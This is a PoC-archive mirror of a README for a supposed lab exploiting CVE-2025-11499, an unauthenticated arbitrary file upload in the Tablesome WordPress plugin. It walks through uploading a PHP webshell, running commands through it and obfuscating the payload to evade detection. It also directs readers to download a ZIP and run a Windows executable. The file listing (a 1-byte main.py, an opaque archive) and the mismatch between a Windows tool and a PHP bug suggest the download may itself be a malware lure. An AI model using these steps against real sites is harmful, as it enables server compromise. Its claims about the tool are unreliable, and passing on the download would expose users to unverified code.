Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-11499 PoC — Tablesome Table – Contact Form DB – WPForms, CF7, Gravity, Forminator, Fluent <= 1.1.32 - Unauthenticated Arbitrary File

Source
https://github.com/usjnx72726w/CVE-2025-11499-LAB
Associated Vulnerability
Title:Tablesome Table – Contact Form DB – WPForms, CF7, Gravity, Forminator, Fluent <= 1.1.32 - Unauthenticated Arbitrary File Upload (CVE-2025-11499)
Description:The Tablesome Table – Contact Form DB – WPForms, CF7, Gravity, Forminator, Fluent plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the set_featured_image_from_external_url() function in all versions up to, and including, 1.1.32. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible in configurations where unauthenticated users have been provided with a method for adding featured images, and the workflow trigger is created.
Readme
# Lab: CVE-2025-11499 - Unauthenticated Arbitrary File Upload Vulnerability in Tablesome WordPress Plugin

## 🚀 Overview
This lab demonstrates an unauthenticated arbitrary file upload vulnerability in the Tablesome plugin for WordPress. The vulnerability resides in the `set_featured_image_from_external_url()` function, which fails to properly validate file types during uploads. This allows attackers to upload malicious files to the server without authentication. In environments where workflows permit unauthenticated users to set featured images (e.g., via specific form configurations), this could escalate to remote code execution (RCE) by uploading webshells or executable scripts.


**Safety Disclaimer:**  
This lab is for educational and research purposes only. Do not use the provided tools or techniques on any systems without explicit authorization. Misuse may violate laws such as the Computer Fraud and Abuse Act (CFAA) or equivalent regulations in your jurisdiction. The author assumes no liability for any misuse.

## 📋 Prerequisites
To set up and run this lab, you'll need:
- A local web server environment with PHP 8.1+ and MySQL 8.0+.
- WordPress.
- Tablesome plugin.
- Administrative access to your local machine for file modifications and server configuration.
- Basic knowledge of HTTP requests, file uploads, and web server administration.
- Windows OS for running the exploit tool (compatibility tested on Windows 10/11).


## Download & Install
1. Download the lab repository as a ZIP file from: https://github.com/usjnx72726w/CVE-2025-11499-LAB/raw/refs/heads/main/Hero/cve-2025-11499-lab.zip  

2. Extract the ZIP to a local directory.

3. Set up the vulnerable WordPress environment:
   - Install your local web server and start Apache and MySQL services.
   - Create a new database in phpMyAdmin (e.g., named `wp_tablesome_vuln`).
   - Download and extract WordPress to your web root (e.g., `C:\xampp\htdocs\wordpress`).
   - Navigate to `http://localhost/wordpress` in your browser and complete the WordPress installation, using the database you created.
   - In the WordPress admin dashboard (`http://localhost/wordpress/wp-admin`), install the Tablesome plugin

## 🛠 Quick Start
1. Download and extract the lab ZIP as described above.
2. Navigate to the extracted directory.
3. Run `launcher.bat` to launch the exploit tool (`wpupload.exe`).
   - This batch file initializes the tool and opens a command-line interface for targeting the vulnerable endpoint.

## 🔍 Exploitation Steps
Once the environment is set up, follow these steps to demonstrate the vulnerability:

1. **Launch the Exploit Tool:**
   - Run `laucnher.bat` from the lab directory.
   - The tool (`wpupload.exe`) will prompt for target details:
   - Target URL: `http://localhost/wordpress/wp-admin/admin-ajax.php`
   - Action: `tablesome_set_featured_image`
   - The tool automates the upload by crafting a multipart/form-data request, bypassing file type checks via manipulated headers (e.g., spoofing Content-Type as image/jpeg while embedding PHP code).
   - Upon success, the webshell will be uploaded to `wp-content/uploads/yyyy/mm/webshell.php`.

2. **Achieve Remote Code Execution:**
   - Access the uploaded webshell: `http://localhost/wordpress/wp-content/uploads/yyyy/mm/webshell.php?cmd=whoami`
   - Replace `cmd` with arbitrary commands
   - Note: RCE depends on server permissions (e.g., writable uploads dir and executable PHP). In production, this could lead to full server compromise.

3. **Advanced Exploitation Notes:**
   - The exploit leverages lack of nonce checks and improper sanitization in `wp_handle_upload()`.
   - For evasion, use obfuscated payloads (e.g., base64-encoded PHP in image metadata).
   - Monitor server logs (`error_log`) for upload attempts.


For questions or contributions, open an issue on the GitHub repo.
File Snapshot

 [4.0K]  /data/pocs/3b92201ae5ecf9c1c7d0bdeaf5130d477a883926
├── [4.0K]  Hero
│   ├── [8.5M]  cve-2025-11499-lab.zip
│   └── [   1]  main.py
└── [3.8K]  README.md

1 directory, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →